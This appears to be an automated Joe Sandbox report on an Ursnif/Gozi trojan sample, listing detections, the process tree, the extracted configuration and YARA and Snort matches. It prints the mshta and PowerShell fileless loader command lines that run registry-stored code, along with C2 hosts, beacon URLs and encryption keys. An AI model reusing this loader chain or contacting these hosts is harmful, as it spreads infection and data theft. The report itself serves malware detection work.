Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bf.exe

Overview

General Information

Sample Name:bf.exe
Analysis ID:722154
MD5:b7ce4f9f6ecd85bb5edbb6964226fdb6
SHA1:12b28a42e960dfc522348eba37b00ea74a0df527
SHA256:bf5845a6b0df356338cc4ae53dd2cdefcb114bd95f351e55fd430cee5408ffeb
Tags:exegozi
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Writes or reads registry keys via WMI
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • bf.exe (PID: 1364 cmdline: C:\Users\user\Desktop\bf.exe MD5: B7CE4F9F6ECD85BB5EDBB6964226FDB6)
    • control.exe (PID: 4784 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • mshta.exe (PID: 5064 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ffsw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ffsw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6048 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4720 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3340 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 2888 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "GMoZf7gMROqzfy+P3mEeqSfHqIRAPg1d/uP2nOBLSR0sg89AdjGg/BLNdTPN8XbPrvLnZTlSAywg+YF//NxPkEZ+7hQVwoW+eGDjXjeTxnbr1pnuZAEZvZ5pJhvMSPakNawHi4xnL8zUKFcpnLcVW6aNM9fO9qEz02wFRvLZs5o11GrslLDYHDvQ0SD/opuDXOeSU7Ly+saXGzcMGJbb2gGYqQeP0wSX+OxMoI8G/dmzRLFFPaEi3LHTEkvTi4eHIKkf+2IdYYEmrS5ODeFooRl4Z5rjK+roU5Xa0a8yQ9B3bgnIiEzG4EM0+jPqnWnC8a0+x+5GseJTLbtpCdro7dXq/ZlwgpjCIEjV3+qceiU=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "45.8.158.104", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "wdeiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com"], "botnet": "10103", "server": "50", "serpent_key": "AFRkxxddsKAnRl2J", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0xff0:$a1: /C ping localhost -n %u && del "%s"
    • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xca8:$a5: filename="%.4u.%lu"
    • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe72:$a9: &whoami=%s
    • 0xe5a:$a10: %u.%u_%u_%u_x%u
    • 0xc22:$a11: size=%u&hash=0x%08x
    • 0xc13:$a12: &uptime=%u
    • 0xda7:$a13: %systemroot%\system32\c_1252.nls
    • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
    00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0xff0:$a1: /C ping localhost -n %u && del "%s"
    • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xca8:$a5: filename="%.4u.%lu"
    • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe72:$a9: &whoami=%s
    • 0xe5a:$a10: %u.%u_%u_%u_x%u
    • 0xc22:$a11: size=%u&hash=0x%08x
    • 0xc13:$a12: &uptime=%u
    • 0xda7:$a13: %systemroot%\system32\c_1252.nls
    • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
    Click to see the 60 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    0.3.bf.exe.13294a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      0.3.bf.exe.12aa4a0.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        0.3.bf.exe.12aa4a0.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          0.3.bf.exe.1355940.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            0.3.bf.exe.13294a0.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              Click to see the 1 entries

              Sigma Signatures

              Data Obfuscation

              barindex
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4604, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline, ProcessId: 6048, ProcessName: csc.exe

              Snort Signatures

              Timestamp:192.168.2.545.8.158.10449696802033204 10/13/22-09:30:54.079674
              SID:2033204
              Source Port:49696
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.545.8.158.10449696802033203 10/13/22-09:30:55.414317
              SID:2033203
              Source Port:49696
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: bf.exeVirustotal: Detection: 76%Perma Link
              Antivirus / Scanner detection for submitted sample
              Source: bf.exeAvira: detected
              Machine Learning detection for sample
              Source: bf.exeJoe Sandbox ML: detected
              Source: 0.0.bf.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
              Source: bf.exeMalware Configuration Extractor: Ursnif {"RSA Public Key": "GMoZf7gMROqzfy+P3mEeqSfHqIRAPg1d/uP2nOBLSR0sg89AdjGg/BLNdTPN8XbPrvLnZTlSAywg+YF//NxPkEZ+7hQVwoW+eGDjXjeTxnbr1pnuZAEZvZ5pJhvMSPakNawHi4xnL8zUKFcpnLcVW6aNM9fO9qEz02wFRvLZs5o11GrslLDYHDvQ0SD/opuDXOeSU7Ly+saXGzcMGJbb2gGYqQeP0wSX+OxMoI8G/dmzRLFFPaEi3LHTEkvTi4eHIKkf+2IdYYEmrS5ODeFooRl4Z5rjK+roU5Xa0a8yQ9B3bgnIiEzG4EM0+jPqnWnC8a0+x+5GseJTLbtpCdro7dXq/ZlwgpjCIEjV3+qceiU=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "45.8.158.104", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "wdeiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com"], "botnet": "10103", "server": "50", "serpent_key": "AFRkxxddsKAnRl2J", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
              Source: bf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Binary string: ntdll.pdb source: bf.exe, 00000000.00000003.678579169.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, bf.exe, 00000000.00000003.670942941.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdbUGP source: bf.exe, 00000000.00000003.678579169.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, bf.exe, 00000000.00000003.670942941.0000000003E50000.00000004.00001000.00020000.00000000.sdmp

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49696 -> 45.8.158.104:80
              Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49696 -> 45.8.158.104:80
              Source: Joe Sandbox ViewASN Name: ASBAXETNRU ASBAXETNRU
              Source: Joe Sandbox ViewIP Address: 45.8.158.104 45.8.158.104
              Source: global trafficHTTP traffic detected: GET /uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmGyBGvTrov_2/Bh6hEUV9tS11RoXAor/dNd5MwAK3/XCS5R5_2BKzlachPA71X/MbdidhiKMdjJAptDG_2/BNaZm8dRfEW1zyXDW0PSBM/dBySGVlelOOwd/9hE4I1n7/jHYTRUOb30YRjhbqgoqT1Sz/1siPfJ_2Bk/jbwyxHgiR7TKhcYfm/asMZ6QS0oVF6/3ktdFVcNy5v/GtXFAG10Xu11CO/A_2BTM8kgrY0K/a9Ia.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /uploaded/yF6a_2FDQsakg/vhzDEpLd/QLXYBzG7kj94jslDUwFt6Q7/guaMASEjD_/2Fwjtn_2FbMKN4_2B/neZHbyl_2FTz/WRcCnPf48th/_2BnEyE4hHu4xb/OQTgNzDOBvYXhZuNKPCjo/Se4kG5Jd15I6_2BO/PIOOLab_2FaIRS_/2BJxZMNIg5OcVaNI8G/mQ26WRsBL/qXoJnMt5W6zv90WyMR1b/Ptzm2woaF0N0gfu_2Fw/LXYoIalnFw_2BDv_2BDw6X/sbGwXMB_2Fbi6/_2BA0mWm/E7uvZfJQauIX0oefIQsSQRv/Edcduhqp0k/CVtU.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /uploaded/QpDDd39Xg69hE/_2B0ljFe/ejlceh6xTXKYE_2FNjyFZ8u/1IFx8YmbAD/LqcuU7ssTJkqwPFlg/hWeAFLWKBX_2/FuGSULoJNuI/pXiWAv4xfVQd4u/DsrDBhEnB5DT42MoZPM7q/jir_2Bh0F0MVJE3k/5vBlfxPNKUgT_2B/QXDj3ClSdhTLafJNAw/sNXum9s6s/h4CR7phBKCx_2BfEXprx/_2BGBrPMfU7LJ2BVQYz/wqZmpr1T9aMfOD0vidLljO/dTWEfDKtUdv7C/RBaLC5at/Ftjzyog_2BvTpjID7eJh6dk/Na.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
              Source: unknownDNS traffic detected: query: trackingg-protectioon.cdn1.mozilla.net replaycode: Name error (3)
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: unknownTCP traffic detected without corresponding DNS query: 45.8.158.104
              Source: bf.exe, 00000000.00000003.612015496.00000000006D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.158.104/uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmG
              Source: bf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
              Source: bf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
              Source: powershell.exe, 00000005.00000003.638688227.000001C32A171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsofU
              Source: bf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
              Source: explorer.exe, 0000000B.00000000.717723054.000000000F014000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://trackingg-protectioon.cdn1.mozilla.net/uploaded/OpQxWz98QKMWv_2/FDwCe9CiLqhz94zXhO/jzUmpRbDp/
              Source: explorer.exe, 0000000B.00000000.699574757.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.723471805.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.667027858.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: unknownDNS traffic detected: queries for: trackingg-protectioon.cdn1.mozilla.net
              Source: global trafficHTTP traffic detected: GET /uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmGyBGvTrov_2/Bh6hEUV9tS11RoXAor/dNd5MwAK3/XCS5R5_2BKzlachPA71X/MbdidhiKMdjJAptDG_2/BNaZm8dRfEW1zyXDW0PSBM/dBySGVlelOOwd/9hE4I1n7/jHYTRUOb30YRjhbqgoqT1Sz/1siPfJ_2Bk/jbwyxHgiR7TKhcYfm/asMZ6QS0oVF6/3ktdFVcNy5v/GtXFAG10Xu11CO/A_2BTM8kgrY0K/a9Ia.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /uploaded/yF6a_2FDQsakg/vhzDEpLd/QLXYBzG7kj94jslDUwFt6Q7/guaMASEjD_/2Fwjtn_2FbMKN4_2B/neZHbyl_2FTz/WRcCnPf48th/_2BnEyE4hHu4xb/OQTgNzDOBvYXhZuNKPCjo/Se4kG5Jd15I6_2BO/PIOOLab_2FaIRS_/2BJxZMNIg5OcVaNI8G/mQ26WRsBL/qXoJnMt5W6zv90WyMR1b/Ptzm2woaF0N0gfu_2Fw/LXYoIalnFw_2BDv_2BDw6X/sbGwXMB_2Fbi6/_2BA0mWm/E7uvZfJQauIX0oefIQsSQRv/Edcduhqp0k/CVtU.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /uploaded/QpDDd39Xg69hE/_2B0ljFe/ejlceh6xTXKYE_2FNjyFZ8u/1IFx8YmbAD/LqcuU7ssTJkqwPFlg/hWeAFLWKBX_2/FuGSULoJNuI/pXiWAv4xfVQd4u/DsrDBhEnB5DT42MoZPM7q/jir_2Bh0F0MVJE3k/5vBlfxPNKUgT_2B/QXDj3ClSdhTLafJNAw/sNXum9s6s/h4CR7phBKCx_2BfEXprx/_2BGBrPMfU7LJ2BVQYz/wqZmpr1T9aMfOD0vidLljO/dTWEfDKtUdv7C/RBaLC5at/Ftjzyog_2BvTpjID7eJh6dk/Na.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Yara detected Ursnif
              Source: Yara matchFile source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR
              Source: Yara matchFile source: 0.3.bf.exe.13294a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.12aa4a0.0.unpack, type: UNPACKEDPE
